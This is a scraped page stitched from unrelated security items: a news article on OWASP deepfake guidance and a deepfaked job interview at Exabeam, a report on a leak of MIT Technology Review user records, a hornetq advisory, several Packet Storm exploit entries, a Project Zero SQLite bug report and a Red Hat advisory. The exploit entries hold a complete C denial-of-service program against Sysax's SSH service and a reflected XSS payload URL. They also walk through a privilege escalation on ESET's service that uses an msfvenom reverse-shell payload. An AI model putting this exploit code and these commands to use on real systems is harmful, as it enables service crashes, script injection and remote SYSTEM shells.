As businesses worry over deepfake scams and other AI attacks, organizations are adding guidance for cybersecurity teams on how to detect, and respond to, next-generation threats. That includes Exabeam, which was recently targeted by a deepfaked job candidate.

Source: Family Stock via Shutterstock

Deepfakes and other generative artificial intelligence (GenAI) attacks are becoming less rare, and signs are pointing to a coming onslaught of such attacks: Already, AI-generated text is becoming more common in emails, and security firms are finding ways to detect emails likely not created by humans. Human-written emails have declined to about 88% of all emails, while text attributed to large language models (LLMs) now accounts for about 12% of all email, up from around 7% in late 2022, according to one analysis.

To help organizations develop stronger defenses against AI-based attacks, the Top 10 for LLM Applications & Generative AI group within the Open Worldwide Application Security Project (OWASP) released a trio of guidance documents for security organizations on Oct. 31. To its previously released AI cybersecurity and governance checklist, the group added a guide for preparing for deepfake events, a framework to create AI security centers of excellence, and a curated database on AI security solutions.

While the previous Top 10 guide is useful for companies building models and creating their own AI services and product, the new guidance is aimed at the users of AI technology, says Scott Clinton, co-project lead at OWASP.

Those companies "want to be able to do AI safely with as much guidance as possible — they're going to do it anyway, because it's a competitive differentiator for the business," he says. "If their competitors are doing it, \[then\] they need to find a way to do it, do it better ... so security can't be a blocker, it can't be a barrier to that."

Related:Dark Reading Confidential: Pen-Test Arrests, 5 Years Later

**One Security Vendor's Job Candidate Deepfake Attack**

In an example of the kinds of real-world attacks that are now happening, one job candidate at security vendor Exabeam had passed all the initial vetting and moved onto the final interview round. That's when Jodi Maas, GRC team lead at the company, recognized that something was wrong.

While the human resources group had flagged the initial interview for a new senior security analyst as "somewhat scripted," the actual interview started with normal greetings. Yet, it quickly became apparent that some form of digital trickery was in use. Background artifacts appeared, the female interviewee's mouth did not match the audio, and she hardly moved or expressed emotion, says Maas, who runs application security and governance, risk, and compliance within Exabeam's security operations center (SOC).

"It was very odd — just no smile, there was no personality at all, and we knew right away that it was not a fit, but we continued the interview, because \[the experience\] was very interesting," she says.

Related:Iranian APT Group Targets IP Cameras, Extends Attacks Beyond Israel

After the interview, Maas approached Exabeam's chief information security officer (CISO), Kevin Kirkwood, and they concluded it had been a deepfake based on similar video examples. The experience shook them enough that they decided the company needed better procedures in place to catch GenAI-based attacks, embarking on meetings with security staff and an internal presentation to employees.

"The fact that it got past our HR group was interesting. ... They passed them through because they had answered all the questions correctly," Kirkwood says.

After the deepfake interview, Exabeam's Kirkwood and Maas started revamping their processes, following up with their HR group, for example to let them know to expect more such attacks in the future. For now, the company advises its employees to treat video calls with suspicion. (Half-jokingly, Kirkwood requested this correspondent to turn on my video midway through the interview as proof of humanness. I did.)

"You're going to see this more often now, and you know these are the things you can check for, and these are the things that you will see in a deepfake," Kirkwood says.

Related:Okta Fixes Auth Bypass Bug After 3-Month Lull

**Technical Anti-Deepfake Solutions Are Needed**

Deepfake incidents are capturing the imagination — and fear — of IT professionals, with about half (48%) very concerned over deepfakes at present, and 74% believing deepfakes will pose a significant future threat, according to a survey conducted by email security firm Ironscales.

The trajectory of deepfakes is quite easy to predict — even if they are not good enough to fool most people today, they will be in the future, says Eyal Benishti, founder and CEO of Ironscales. That means that human training will likely only go so far. AI videos are getting eerily realistic, and a fully digital twin of another person controlled in real time by an attacker — a true "sock puppet" — is likely not far behind.

"Companies want to try and figure out how they get ready for deepfakes," he says. "The are realizing that this type of communication cannot be fully trusted moving forward, which ... will take people some time to realize and adjust."

In the future, since the telltale artifacts will be gone, better defenses are necessary, Exabeam's Kirkwood says.

"Worst case scenario: The technology gets so good that you're playing a tennis match — you know, the detection gets better, the deepfake gets better, the detection gets better, and so on," he says. "I'm waiting for the technology pieces to catch up, so I can actually plug it into my SIEM and flag the elements associated with deepfake."

OWASP's Clinton agrees. Rather focus on training humans to detect suspect video chats, companies should create infrastructures for authenticating that a chat is with a human who is also an employee, building processes around financial transactions, and creating an incident-response plan, he says.

"Training people on how to identify deepfakes — that's not really practical, because it's all subjective," Clinton says. "I think there have to be more unsubjective approaches, and so we went through and came up with some tangible steps that you can use, which are combinations of technologies and process to really focus on a few areas."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

OWASP Beefs Up GenAI Security Guidance Amid Growing Deepfakes

Hackers claim to have breached MIT Technology Review Magazine via a third-party contractor, leaking nearly 300,000 user records…

Hackers claim to have breached MIT Technology Review Magazine via a third-party contractor, leaking nearly 300,000 user records on Breach Forums. Data includes full names, email addresses, and activity details, posing risks for phishing and targeted scams.

In a new data breach disclosed today, the hacker known as Intel Broker claims to have stolen the personal data of 290,762 individuals from MIT’s _Technology Review_ website via a third-party contractor. The data, which could be the website’s newsletter subscribers list, was posted on Breach Forums, a popular cybercrime platform, earlier today.

Intel Broker, notorious for **recent attacks on high-profile organizations**, alleges that the data includes Personally Identifiable Information. Hackread.com analyzed the leaked data and can confirm it includes personal details, which, while not as sensitive as financial data, could be leveraged in phishing attempts or targeted scams. Here is what the hacker has leaked:

*   **Full names**
*   **Dates of activity**
*   **Educational details**
*   **Email addresses (3,924 – After removal of duplicates: 1,343)**

Screenshot from the leaked data (Credit: Hackread.com)

Though the leak does not appear to contain highly sensitive information like passwords, social security numbers or financial data, the compromised data is still a privacy risk, as it could be exploited for phishing scams or identity verification attacks.

It is worth noting that this is not the first time Intel Broker has targeted a technology publication. In June 2024, an affiliate of Intel Broker **breached the “Tech in Asia” news outlet**, leaking the personal data of 221,470 users.

MIT Technology Review, an esteemed publication from the Massachusetts Institute of Technology, is known for its analysis of emerging technologies and their impact on society. This data breach potentially exposes readers and contributors who engaged with the platform, a situation that may lead to reputational challenges for the publication, as well as privacy concerns for its user base.

**Recent Activity of Intel Broker**

The alleged breach of Technology Review comes on the heels of another claim by Intel Broker, who recently advertised the sale of **sensitive internal data from Nokia** on the same forum, allegedly obtained through a similar contractor vulnerability. In the Nokia case, the hacker reportedly set a price of $20,000 for access to the stolen data, which included SSH keys, source code, and login credentials.

**Privacy Implications and MIT’s Response**

With names, email addresses, and activity data accessible, cybercriminals may use this information to craft sophisticated schemes aimed at those connected with the platform. Hackread.com has reached out to MIT’s Technology Review for a response regarding the data breach. Updates will be provided as more information becomes available. Stay tuned.

1.  **US Microchip Giant Cyberattack Disrupts Operations**
2.  **Hacker IntelBroker Leaks Sensitive US DoD Documents**
3.  **IntelBroker Apple Breach: Steals Source Code for Internal Tools**
4.  **AMD Data Breach: IntelBroker Steals Employee and Product Info**
5.  **Europol Hacked: IntelBroker Claims Major Law Enforcement Breach**

Hackers Leak 300,000 MIT Technology Review Magazine User Records

An issue in the `createTempFile` method of hornetq v2.4.9 allows attackers to arbitrarily overwrite files or access sensitive information.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-r7mv-mv7m-pjw3: hornetq vulnerable to file overwrite, sensitive information disclosure

Sysax Multi Server version 6.9.9 suffers from an SSH related denial of service vulnerability.

    # Exploit Title: Sysax Multi Server 6.99 - SSH Denial of Service# Date: 2024-11-03# Exploit Author: Yehia Elghaly (Mrvar0x)# Vendor Homepage: https://www.sysax.com/# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi# Version: Sysax Multi Server 6.99# Tested on: Windows 10 x64#Steps --> Compile (gcc -o ssh ssh.c)#Steps --> Run (sudo ./ssh <Target IP> <Port>)#Steps --> Crash (SSH Crashed)#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <arpa/inet.h>#include <sys/socket.h>#include <netinet/tcp.h>void error_handling(const char *message) {    perror(message);    exit(1);}int main(int argc, char *argv[]) {    if (argc != 3) {        printf("Usage: %s <IP> <Port>\n", argv[0]);        exit(1);    }    const char *host = argv[1];    int port = atoi(argv[2]);        unsigned char packet[] = {0x01, 0x02, 0x03, 0x04, 0xAA, 0xBB, 0xCC, 0xDD,      0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,      0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00, 0xFF,      0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80,      0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A,      0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF,      0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08,      0xF1, 0xE2, 0xD3, 0xC4, 0xB5, 0xA6, 0x97, 0x88,      0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF,      0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,    0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF,    0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x99, 0x88,    0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x00,  };  int sock = socket(AF_INET, SOCK_STREAM, 0);    if (sock == -1) {        error_handling("Socket creation failed");    }    int flag = 1;    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));    struct linger sl = {1, 0}; // Close immediately    setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));    struct sockaddr_in serv_addr;    memset(&serv_addr, 0, sizeof(serv_addr));    serv_addr.sin_family = AF_INET;    serv_addr.sin_addr.s_addr = inet_addr(host);    serv_addr.sin_port = htons(port);    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == -1) {        error_handling("Connect failed");    }    const char *ssh_banner = "SSH-2.0-OpenSSH_7.1p1 Debian-5ubuntu1\r\n";    if (send(sock, ssh_banner, strlen(ssh_banner), 0) == -1) {        error_handling("Failed to send SSH banner");    }    usleep(100000);     for (int i = 0; i < 5; ++i) {        if (send(sock, packet, sizeof(packet), 0) == -1) {            error_handling("Failed to send payload");        }        usleep(50000); // Short delay between sends    }    printf("Payload sent successfully.\n");    char buffer[1024];    ssize_t bytes_received = recv(sock, buffer, sizeof(buffer) - 1, 0);    if (bytes_received > 0) {        buffer[bytes_received] = '\0';        printf("Received response: %s\n", buffer);    } else {        printf("No response received or connection closed.\n");    }    close(sock);    return 0;}

Sysax Multi Server 6.99 SSH Denial Of Service

Sysax Multi Server version 6.9.9 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Sysax Multi Server 6.99 - Reflected XSS# Date: 2024-11-03# Exploit Author: Yehia Elghaly (Mrvar0x)# Vendor Homepage: https://www.sysax.com/# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi# Version: MultiServer 6.99# Tested on: Windows 10 x64Reflected XSS - Affected Parameter  (/scgi?sid).PoC:192.168.1.160/scgi?sid=44abd541f5a769556f36080e7c8a7b1f68e04510<script>alert("XSS")</script>&pid=transferpage2_name1_fff.htm

Sysax Multi Server 6.99 Cross Site Scripting

IBM Security Verify Access versions prior to 10.0.8 suffer from authentication bypass, reuse of private keys, local privilege escalation, weak settings, outdated libraries, missing password, hardcoded secrets, remote code execution, missing authentication, null pointer dereference, and lack of privilege separation vulnerabilities.

IBM Security Verify Access 32 Vulnerabilities

IBM Security Verify Access Appliance suffers from multiple insecure transit vulnerabilities, hardcoded passwords, and uninitialized variables. ibmsecurity versions prior to 2024.4.5 are affected.

IBM Security Verify Access Appliance Insecure Transit / Hardcoded Passwords

ESET NOD32 Antivirus version 18.0.12.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET NOD32 Antivirus 18.0.12.0 - "ESET Service" UnquotedService Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2024-11-02# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# MiRROR-H: https://mirror-h.org/search/hacker/49626/# Vendor : https://www.eset.com# Version : 18.0.12.0# Tested on OS: Microsoft Windows 10 pro x64About Unquoted Service Path :==============================When a service is created whose executable path contains spaces and isn'tenclosed within quotes, leads to a vulnerability known as Unquoted ServicePath which allows a user to gain SYSTEM privileges.(only if the vulnerable service is running with SYSTEM privilege levelwhich most of the time it is).Description:==============================ESET NOD32 Antivirus installs a service with an unquoted service path.To properly exploit this vulnerability, the local attacker must insert anexecutable file in the path of the service.Upon service restart or system reboot, the malicious code will be run withelevated privileges.# PoC===========1.  Open CMD and check for the vulnerability by typing [ wmic service getname,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v"c:\windows\\" | findstr /i /v """ ]2.  The vulnerable service would show up.3.  Check the service permissions by typing [ sc qc "ekrn" ]4.  The command would return..C:\Users\Ci3c0>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem5.  This concludes that the service is running as SYSTEM.6.  Now create a payload with msfvenom or other tools and name it toekrn.exe.7.  Make sure you have write permissions to "C:\Program Files\ESET\ESETSecurity" directory.8.  Provided that you have right permissions, drop the HDDHealthService.exeexecutable you created into the "C:\Program Files\ESET\ESET Security"directory.9.  Start a listener.9.  Now restart the ekrn service by giving coommand [ sc stop ekrn ]followed by [ sc start ekrn ]9.1 If you cannot stop and start the service, since the service is of type"AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ]and get the shell when the service starts automatically.10. Got shell.During my testing :Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o ekrn.exe# Disclaimer=============The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise.The author is not responsible for any misuse of the information containedherein and accepts no responsibility for any damage caused by the use ormisuse of this information.The author prohibits any malicious use of security related information orexploits by the author or elsewhere.

ESET NOD32 Antivirus 18.0.12.0 Unquoted Service Path

SQLite3 suffers from a stack buffer underflow condition in seriesBestIndex in the generate_series extension.

    Vulnerability detailsstatic int seriesBestIndex(  sqlite3_vtab *pVTab,  sqlite3_index_info *pIdxInfo){  int i, j;              /* Loop over constraints */  int idxNum = 0;        /* The query plan bitmask */#ifndef ZERO_ARGUMENT_GENERATE_SERIES  int bStartSeen = 0;    /* EQ constraint seen on the START column */#endif  int unusableMask = 0;  /* Mask of unusable constraints */  int nArg = 0;          /* Number of arguments that seriesFilter() expects */  int aIdx[7];           /* Constraints on start, stop, step, LIMIT, OFFSET,                         ** and value.  aIdx[5] covers value=, value>=, and                         ** value>,  aIdx[6] covers value<= and value< */  const struct sqlite3_index_constraint *pConstraint;  /* This implementation assumes that the start, stop, and step columns  ** are the last three columns in the virtual table. */  assert( SERIES_COLUMN_STOP == SERIES_COLUMN_START+1 );  assert( SERIES_COLUMN_STEP == SERIES_COLUMN_START+2 );  aIdx[0] = aIdx[1] = aIdx[2] = aIdx[3] = aIdx[4] = aIdx[5] = aIdx[6] = -1;  pConstraint = pIdxInfo->aConstraint;  for(i=0; i<pIdxInfo->nConstraint; i++, pConstraint++){    int iCol;    /* 0 for start, 1 for stop, 2 for step */    int iMask;   /* bitmask for those column */    int op = pConstraint->op;    if( op>=SQLITE_INDEX_CONSTRAINT_LIMIT     && op<=SQLITE_INDEX_CONSTRAINT_OFFSET    ){      if( pConstraint->usable==0 ){[...]      }      continue;    }    if( pConstraint->iColumn==SERIES_COLUMN_VALUE ){      switch( op ){[...]      }      continue;    }    iCol = pConstraint->iColumn - SERIES_COLUMN_START;  // *** 1 ***    assert( iCol>=0 && iCol<=2 ); // *** 2 ***    iMask = 1 << iCol;#ifndef ZERO_ARGUMENT_GENERATE_SERIES    if( iCol==0 && op==SQLITE_INDEX_CONSTRAINT_EQ ){      bStartSeen = 1;    }#endif    if( pConstraint->usable==0 ){      unusableMask |=  iMask;      continue;    }else if( op==SQLITE_INDEX_CONSTRAINT_EQ ){      idxNum |= iMask;      aIdx[iCol] = i; // *** 3 ***    }  }  struct sqlite3_index_constraint {     int iColumn;              /* Column constrained.  -1 for ROWID */ // *** 4 ***     unsigned char op;         /* Constraint operator */     unsigned char usable;     /* True if this constraint is usable */     int iTermOffset;          /* Used internally - xBestIndex should ignore */  } *aConstraint;            /* Table of WHERE clause constraints */The seriesBestIndex function doesn't handle rowid constraints correctly. The code at [1] expects iColumn to be one of SERIES_COLUMN_START, SERIES_COLUMN_STOP, or SERIES_COLUMN_STEP (values 1, 2, or 3). However, the line can also be reached with a rowid constraint with an iColumn value of -1. Depending on the build configuration, the negative iCol may either trigger an assertion failure at [2] or lead to an out-of-bounds memory write access at [3].Version3.47.0 2024-10-05 12:02:17 2f7eab381e16760952d1c90a9119d2a217933f0136442d8f6eeb6d95e366ca4f (64-bit)Reproduction caseSELECT * FROM generate_series(1, 1) WHERE rowid = 1When built with assertions, the SQLite shell crashes with an assertion failure:shell.c:6816: seriesBestIndex: Assertion `iCol>=0 && iCol<=2' failed.When built with NDEBUG and ASan, the program produces the following crash report:==2623073==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7ff83210be18 at pc 0x55dbc9afcd14 bp 0x7ffc7a497cd0 sp 0x7ffc7a497cc8WRITE of size 4 at 0x7ff83210be18 thread T0    #0 0x55dbc9afcd13 in seriesBestIndex shell.c:6828    #1 0x55dbc9d5aaa9 in vtabBestIndex sqlite3.c:164633    #2 0x55dbc9d66290 in whereLoopAddVirtualOne sqlite3.c:167237    #3 0x55dbc9d67e57 in whereLoopAddVirtual sqlite3.c:167549    #4 0x55dbc9d69f06 in whereLoopAddAll sqlite3.c:167822    #5 0x55dbc9d73724 in sqlite3WhereBegin sqlite3.c:169776    #6 0x55dbc9d1b3d2 in sqlite3Select sqlite3.c:151580    #7 0x55dbc9d8c131 in yy_reduce sqlite3.c:177608    #8 0x55dbc9d98b5c in sqlite3Parser sqlite3.c:179058    #9 0x55dbc9d9cc59 in sqlite3RunParser sqlite3.c:180392    #10 0x55dbc9cf1863 in sqlite3Prepare sqlite3.c:143187    #11 0x55dbc9cf1f65 in sqlite3LockAndPrepare sqlite3.c:143262    #12 0x55dbc9cf2356 in sqlite3_prepare_v2 sqlite3.c:143349    #13 0x55dbc9b30f63 in shell_exec shell.c:24228    #14 0x55dbc9b58583 in runOneSqlLine shell.c:31909    #15 0x55dbc9b59624 in process_input shell.c:32097    #16 0x55dbc9b5d1b7 in main shell.c:33026    #17 0x7ff834243b89 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58    #18 0x7ff834243c44 in __libc_start_main_impl ../csu/libc-start.c:360    #19 0x55dbc9ae27a0 in _start (sq+0x4a7a0) (BuildId: 8e6639a5755a4687574b3d22d6cf593ca32bb8b6)Address 0x7ff83210be18 is located in stack of thread T0 at offset 24 in frame    #0 0x55dbc9afc4b6 in seriesBestIndex shell.c:6732  This frame has 1 object(s):    [32, 60) 'aIdx' (line 6740) <== Memory access at offset 24 underflows this variableWe've observed that, depending on the compiler and SQLite build configuration, this issue may allow an attacker to overwrite pConstraint, which makes it likely exploitable. However, the generate_series extension is only enabled by default in the shell binary and not the library itself, so the impact of the issue is limited.Credit informationSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-01-07.For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html

SQLite3 generate_series Stack Buffer Underflow

Red Hat Security Advisory 2024-8425-03 - Red Hat OpenShift Container Platform release 4.15.37 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8425.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.37 bug fix and security update  
Advisory ID:        RHSA-2024:8425-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8425  
Issue date:         2024-11-04  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.37 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.37. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:8428

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)  
* encoding/gob: golang: Calling Decoder.Decode on a message which contains  
deeply nested structures can cause a panic due to stack exhaustion  
(CVE-2024-34156)  
* containers/image: digest type does not guarantee valid type  
(CVE-2024-3727)  
* net/http: Denial of service due to improper 100-continue handling in  
net/http (CVE-2024-24791)  
* cloudevents/sdk-go: usage of WithRoundTripper to create a Client leaks  
credentials (CVE-2024-28110)  
* jose-go: improper handling of highly compressed data (CVE-2024-28180)  
* go/parser: golang: Calling any of the Parse functions containing deeply  
nested literals can cause a panic/stack exhaustion (CVE-2024-34155)  
* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag  
line with deeply nested expressions can cause a panic due to stack  
exhaustion (CVE-2024-34158)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2268372  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://bugzilla.redhat.com/show_bug.cgi?id=2274767  
https://bugzilla.redhat.com/show_bug.cgi?id=2295310  
https://bugzilla.redhat.com/show_bug.cgi?id=2310527  
https://bugzilla.redhat.com/show_bug.cgi?id=2310528  
https://bugzilla.redhat.com/show_bug.cgi?id=2310529  
https://issues.redhat.com/browse/OCPBUGS-19254  
https://issues.redhat.com/browse/OCPBUGS-37704  
https://issues.redhat.com/browse/OCPBUGS-39018  
https://issues.redhat.com/browse/OCPBUGS-41838  
https://issues.redhat.com/browse/OCPBUGS-42335  
https://issues.redhat.com/browse/OCPBUGS-42470  
https://issues.redhat.com/browse/OCPBUGS-42471  
https://issues.redhat.com/browse/OCPBUGS-42480  
https://issues.redhat.com/browse/OCPBUGS-42611  
https://issues.redhat.com/browse/OCPBUGS-42648  
https://issues.redhat.com/browse/OCPBUGS-42726  
https://issues.redhat.com/browse/OCPBUGS-42780  
https://issues.redhat.com/browse/OCPBUGS-42881  
https://issues.redhat.com/browse/OCPBUGS-42934  
https://issues.redhat.com/browse/OCPBUGS-42992  
https://issues.redhat.com/browse/OCPBUGS-43057  
https://issues.redhat.com/browse/OCPBUGS-43468  
https://issues.redhat.com/browse/OCPBUGS-43626  
https://issues.redhat.com/browse/OCPBUGS-43635

Tag

#vulnerability